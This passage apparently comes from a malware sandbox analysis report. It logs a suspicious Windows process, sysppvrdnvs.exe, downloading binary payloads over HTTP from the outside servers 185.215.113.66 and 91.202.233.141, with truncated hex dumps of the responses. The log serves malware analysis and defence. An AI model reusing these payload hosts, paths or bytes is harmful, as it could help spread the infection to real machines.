                                                                                                                                                        Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                        Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                        Oct 26, 2024 07:26:33.827410936 CEST1236INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                        Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
                                                                                                                                                        Oct 26, 2024 07:26:33.827430964 CEST1236INData Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
                                                                                                                                                        Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4
                                                                                                                                                        Oct 26, 2024 07:26:33.827442884 CEST1236INData Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50
                                                                                                                                                        Data Ascii: Rx7U;4>^*cCuqX*>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|
                                                                                                                                                        Oct 26, 2024 07:26:33.827462912 CEST448INData Raw: 2d 5d 5d 9a a2 19 58 54 3f 1c 22 27 fe cc 6c ae 32 01 57 29 8c 43 bd f9 12 3a 50 2a 41 97 76 a7 d8 52 38 48 d8 e9 cd 74 59 bb d4 bf b6 10 02 29 f9 f4 15 10 c3 73 2a 5e da 1f b6 fe f8 51 3f f6 9f 7b 5a 9f 07 62 9c 14 01 e1 93 84 e8 4e b5 e0 0e b3
                                                                                                                                                        Data Ascii: -]]XT?"'l2W)C:P*AvR8HtY)s*^Q?{ZbNg!WOxD%f~vp{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q
                                                                                                                                                        Oct 26, 2024 07:26:33.827477932 CEST1236INData Raw: 9a 3d 1a cb 65 63 99 e9 ec 2a ec 6a 74 27 b6 34 e7 e0 38 9c 1f bd 84 c7 dd 5d 7e e8 48 a4 d8 f8 44 7b 6e a3 ed a1 ad 86 a6 86 56 bb 53 ac a1 28 d7 bd 27 4d a3 8f fc 96 cd 1b 45 18 db 7b b1 2c 9c 60 20 ba 19 27 f9 33 04 09 cf 97 a0 29 74 a8 c0 b0
                                                                                                                                                        Data Ascii: =ec*jt'48]~HD{nVS('ME{,` '3)t#Av@:VtVBD8^e`,idHd8H0"_]>4]23BIZ?[LxIX~$"dT~4PDKy\MI8kgy$"?
                                                                                                                                                        Oct 26, 2024 07:26:33.827490091 CEST1236INData Raw: d7 7a 67 28 d6 c6 01 2c 3d 2d 4c 98 3c d5 c2 bb 7a 20 67 e8 b5 c8 62 12 bb 0d be 5d 6b 63 d5 b8 d9 cf 76 b6 d5 53 0e c0 5d f2 84 03 26 79 78 c2 d4 60 35 9c 49 80 8e d5 5d c1 e3 7c 99 ec aa e5 5c ae dd a7 55 39 f2 15 94 88 7c 03 9b 18 96 55 32 7d
                                                                                                                                                        Data Ascii: zg(,=-L<z gb]kcvS]&yx`5I]|\U9|U2}!#m<R122do*z:=J-VmM[':50oNn_:Os}^~sH.Idu#}HRz"EnyT/*V\3V*W]1`i
                                                                                                                                                        Oct 26, 2024 07:26:33.827513933 CEST1236INData Raw: 14 cd 56 60 47 0b 9a 54 1a 8c ee bf a8 31 cd bb 22 dc be 9b 16 2f b5 03 00 e1 8f b6 86 97 ba d9 a6 60 2f 5a 56 98 9b c4 8e 78 0c e0 4f f2 ab 29 c8 b6 f6 ec e4 57 74 e1 42 50 81 af e8 17 0e 76 2f e1 87 0e 48 6b 26 1f e1 01 98 2f e2 e7 27 92 a1 60
                                                                                                                                                        Data Ascii: V`GT1"/`/ZVxO)WtBPv/Hk&/'`gM<Zs3UB`>-XY)#4&~[Yzhvy,@xWY>/ !P(I,SkM79q(4jOOxq"&L`b
                                                                                                                                                        Oct 26, 2024 07:26:33.827524900 CEST1236INData Raw: 08 a2 77 8f 51 fe 79 8c 2b 20 db ad dc ab 47 03 4f 76 3f 46 71 02 01 c3 1c bc 6f be 47 0c 45 ea dd ea 60 97 60 cc 82 45 0f 07 0c 78 08 1b c3 24 99 05 80 de 3b 7b 1d 13 c7 90 25 8a 6d 97 fc 00 e3 ed 14 df c9 51 c9 91 05 8c 6a 05 46 4b b4 f7 83 01
                                                                                                                                                        Data Ascii: wQy+ GOv?FqoGE``Ex$;{%mQjFKky.OaXm%725!!-lZrRC~'pCU\AeJ1$ncSVqq-sqFr6{+:lka5F{kCBt|c
                                                                                                                                                        Oct 26, 2024 07:26:33.827538013 CEST448INData Raw: a3 e7 0f a0 a6 f0 72 ae 25 a0 37 be c6 0a 30 26 fe d3 63 de c6 05 e7 ac bd f4 a9 1c ee 13 24 39 8e ca ad 2d c8 09 fc d1 d4 27 94 fc a4 8f 37 1f 97 0d 50 0d 25 4c 55 50 3e aa 76 f2 63 b5 be 2f 8d 31 19 8c 3f 45 44 3e 98 37 82 be 32 14 a7 65 11 ea
                                                                                                                                                        Data Ascii: r%70&c$9-'7P%LUP>vc/1?ED>72e+-s<cpAU_. {w2#Uf(eq=(jq(PZqBpDEQ}m6ZgPGSoty}3_Z}a.:ECcb
                                                                                                                                                        Oct 26, 2024 07:26:33.832870007 CEST1236INData Raw: 3d ea 56 08 b8 ef 53 61 0d 1f 5d 2b 7f 33 16 8e 38 8e 34 bb 28 13 f4 8f c0 71 68 6b f4 63 25 63 92 07 2d e0 e6 37 fa 70 30 e3 b4 00 51 cb 2e 37 b8 23 41 8d e8 05 91 e7 fa 39 b4 3c 55 a2 0e 88 33 ee 4e 57 d6 07 d8 98 34 cc 3a af b7 30 8d ce e7 54
                                                                                                                                                        Data Ascii: =VSa]+384(qhkc%c-7p0Q.7#A9<U3NW4:0T]Gl_Ht&:UP}u|C_/S0'n!C??&ol@ &d'C(!S"EYDXW`IN6Z-C%"Zt1#=D&5 R


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.549812185.215.113.66807488C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 26, 2024 07:26:38.551296949 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:39.456511021 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:39 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 8960
                                                                                                                                                        Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "671230ee-2300"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                        Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                        Oct 26, 2024 07:26:39.456531048 CEST1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                        Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                                                        Oct 26, 2024 07:26:39.456542969 CEST1236INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                                                        Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                                                        Oct 26, 2024 07:26:39.456554890 CEST336INData Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76
                                                                                                                                                        Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
                                                                                                                                                        Oct 26, 2024 07:26:39.456567049 CEST1236INData Raw: 35 91 9b c1 14 4c d0 91 fe aa bd 52 c5 29 72 9d e3 bc 39 de cd a5 b4 b1 58 e9 96 a3 2b 25 d0 11 07 be f8 ed 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8
                                                                                                                                                        Data Ascii: 5LR)r9X+%qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#U
                                                                                                                                                        Oct 26, 2024 07:26:39.456604004 CEST1236INData Raw: 33 10 82 8d 90 54 9e bb 7c c3 87 86 d3 12 55 e8 4a 8a 16 82 0c 91 2e b8 d1 1d bb bf dc e7 4c f3 af 8e cf 43 b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75
                                                                                                                                                        Data Ascii: 3T|UJ.LCw1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A
                                                                                                                                                        Oct 26, 2024 07:26:39.456624031 CEST1236INData Raw: 6c 81 82 15 e3 70 20 82 3e e5 10 11 69 9b c5 78 03 32 55 28 01 11 d9 5b bf 7c 8f f7 52 e2 75 fa 3e a7 e6 71 c7 16 06 88 4f a6 d0 e2 07 16 8f d1 6f 4f ed 61 fd 2f f4 a0 9c 03 da 7f 60 b3 09 01 fb 75 30 18 7f f9 60 5d c4 9a c2 7e 36 ce f1 82 6c 67
                                                                                                                                                        Data Ascii: lp >ix2U([|Ru>qOoOa/`u0`]~6lgMhwROak:%xN;Y]DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=
                                                                                                                                                        Oct 26, 2024 07:26:39.456646919 CEST1236INData Raw: f6 56 30 b3 3a 65 04 c3 55 fa b5 49 01 cb 37 ea ec 22 5b 30 9a 0a 04 9c d2 c4 90 d9 af 3e 7c f2 da fa a0 c6 ac 89 75 c0 db 08 0e 2b ba 62 f1 ce af 70 b2 74 97 c8 9b 68 6e 8f 03 71 69 8e 1c 2f 8e 04 97 ed f1 66 d1 b6 b2 d3 72 b6 80 88 41 93 d1 4c
                                                                                                                                                        Data Ascii: V0:eUI7"[0>|u+bpthnqi/frALB?mWAE05E/z6Q[O7P2"[d&mM9TL|yL"6E0,)=UPr4;2JaQ{f8-{=i,JHy +9Oq
                                                                                                                                                        Oct 26, 2024 07:26:39.456670046 CEST236INData Raw: 85 bc 8a fa dc af 0d e0 30 c3 1e cc 98 59 60 14 22 c4 07 30 d0 57 99 c1 35 8a 41 79 f6 05 db 6a e2 36 97 56 92 29 2e 94 19 14 8b 7c 45 4e 62 61 1d 90 74 32 02 27 06 29 3b 90 dc 43 c3 f8 61 11 5d c0 07 39 3a d8 39 a0 16 43 27 2f df 3b bf 2f 40 51
                                                                                                                                                        Data Ascii: 0Y`"0W5Ayj6V).|ENbat2');Ca]9:9C'/;/@QF6aa(KJ[ZgUP\+Lzx!0hH$;9`6\(<V67E9/:j;>|Wk<cb4Gcap`%SmttII@i


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.549823185.215.113.66807488C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 26, 2024 07:26:40.477576971 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:41.389425039 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:41 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 8960
                                                                                                                                                        Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "671230ee-2300"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                        Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                        Oct 26, 2024 07:26:41.389451981 CEST1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                        Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                                                        Oct 26, 2024 07:26:41.389468908 CEST1236INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                                                        Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                                                        Oct 26, 2024 07:26:41.389489889 CEST1236INData Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76
                                                                                                                                                        Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
                                                                                                                                                        Oct 26, 2024 07:26:41.389504910 CEST1236INData Raw: f3 c6 cf f8 95 24 43 84 1e 1f 9b 9c d9 67 06 dc 57 43 c0 ff d4 c9 b4 19 52 67 b0 40 5c 8f 00 ab 9d ff 39 47 b4 07 78 4f 3d ea 81 53 76 ad 4d 76 16 a5 b7 2e e5 b9 6d 89 3c f6 9f 00 cc a4 9a b7 cc 8f b1 36 f8 1a e3 38 6a df fd 09 9e 74 6f 47 14 bc
                                                                                                                                                        Data Ascii: $CgWCRg@\9GxO=SvMv.m<68jtoG M,"p-R6(=6;BS)2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%
                                                                                                                                                        Oct 26, 2024 07:26:41.389520884 CEST1236INData Raw: 94 04 da 8e d4 c0 98 3e 24 6d 01 7b 78 3d 57 2b 8b 06 77 55 2d 93 2b 04 bb 96 97 82 3d 6b 0f a9 c8 ef 2f e2 ce 5d 74 af 33 db 0c 35 3d f4 cd c7 65 c3 05 79 78 24 ce f4 a6 99 58 93 43 df f2 17 d2 12 2f 0c c1 a0 51 33 10 28 3d c5 a6 ec 61 a7 46 c8
                                                                                                                                                        Data Ascii: >$m{x=W+wU-+=k/]t35=eyx$XC/Q3(=aFS3RJr^{@[W\)9f>F}+V1*p0RQO{jwdL0_2}hGn[>q>a r{tVJ0sN]Q\-#6npc`
                                                                                                                                                        Oct 26, 2024 07:26:41.389535904 CEST1236INData Raw: d3 90 d1 fd d7 07 74 76 fe e7 1d df 46 a6 78 b3 3b 32 6d d7 75 d6 e6 a1 f8 ad 93 84 f2 7f 70 fa 89 4b 36 27 09 96 bc b1 c7 59 94 41 08 18 1d 5f 62 ee ed a0 2c 51 1b 21 fd cb 69 5e 5b 4f 79 a3 18 ee 3b 5f a3 09 af 9e 3b d6 57 f1 8e a7 51 41 72 bb
                                                                                                                                                        Data Ascii: tvFx;2mupK6'YA_b,Q!i^[Oy;_;WQAr_2H}/%~.6*rjk>DQgo_7}-)i&O%[u{zhaRIN9<[C&WK,+-27}#hH?FDr2Ey#s
                                                                                                                                                        Oct 26, 2024 07:26:41.389553070 CEST572INData Raw: 55 e5 ce d3 04 5e db d4 1d 7b f1 54 f1 b2 98 ad 4d 05 61 bb 44 52 dc d6 71 c2 cd 92 2d bb 49 dd a2 94 56 b2 b2 25 da 20 db e3 b2 38 79 3f fa da 49 f5 48 08 d8 37 e6 42 37 9c 23 52 b2 14 9d 3f 51 1c 92 66 1d 0c 45 5e a7 ad b6 d4 a1 fd 2f f0 9f f8
                                                                                                                                                        Data Ascii: U^{TMaDRq-IV% 8y?IH7B7#R?QfE^/CWIyjuk&x9a6TQ)t!)z[c=FR"#{'qd(;I0}<l#%/0>$L%j,6SpcqFjAc0%GhGci,g


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.54984191.202.233.141807488C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 26, 2024 07:26:43.770405054 CEST171OUTGET /dwntbl HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 91.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.712740898 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:44 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 85760
                                                                                                                                                        Last-Modified: Thu, 10 Oct 2024 07:40:46 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "670784fe-14f00"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 73 9b e7 57 5d 0f d3 d2 df 96 5f cd 0b 7c 4f ed 0c 59 d0 57 11 1e d2 e1 d7 80 f2 d5 71 10 6a 2a 87 07 22 a6 6e cb ec f0 12 2b 90 48 7c 5c 16 07 b9 45 84 db 5b 0a 45 14 0a 85 27 cc d7 59 7c da 9a 7b 65 fc bd 3a fa 59 0e 93 5d 05 00 75 cc 1f a7 e0 58 a4 00 6a 1d 1a 9d b3 52 e6 b5 0f 65 00 37 82 7e 11 70 29 d8 ff d3 7f 78 7e e8 6a b3 03 74 22 aa 75 0a 3e 4e 93 86 8f b5 6a 07 3e c5 d8 6b 40 22 08 93 91 df a9 65 51 ba ae b8 e0 c8 6f 4e 8c ac e2 9d 3b 24 34 1b 93 8f f4 78 b3 6e 76 b5 c4 13 f7 e3 32 60 41 bf 53 cc 98 0b f3 1a bf 74 bd 52 b8 1c 29 4f e9 c4 e2 82 d4 b2 f8 b7 0a 11 b2 be a8 25 a0 53 0e d1 ce da 31 eb 63 a9 59 c5 1f 8a d9 02 58 af ae c8 c9 d4 fa d3 e8 9f 75 1b 4e af 82 94 08 2a 54 0b 9a 60 cf 58 b6 57 56 bd c6 0a 54 8a e6 70 e6 66 05 db 03 84 b9 2b 25 e7 7b 25 5d 50 e3 db c0 7a dc 3b dd 8d e0 cf f1 1f e1 7a ed 83 b6 92 25 c6 22 b1 a6 c3 ae 1b b6 56 0f 7a 67 5a 13 cb 6a f1 c9 f6 7f eb a8 9e 1a 49 3b fa 62 7a f9 8f 2e 10 81 4d 4d 62 d8 b2 c0 62 35 68 1b e3 19 6d 92 6f e9 25 00 d2 91 21 07 4d 9d [TRUNCATED]
